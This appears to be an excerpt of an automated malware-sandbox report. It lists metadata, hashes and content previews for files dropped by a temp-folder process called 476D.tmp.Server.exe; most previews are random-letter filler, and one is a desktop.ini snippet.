                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):402
                                                                                                                                                                                                                                Entropy (8bit):3.493087299556618
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
                                                                                                                                                                                                                                MD5:ECF88F261853FE08D58E2E903220DA14
                                                                                                                                                                                                                                SHA1:F72807A9E081906654AE196605E681D5938A2E6C
                                                                                                                                                                                                                                SHA-256:CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
                                                                                                                                                                                                                                SHA-512:82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
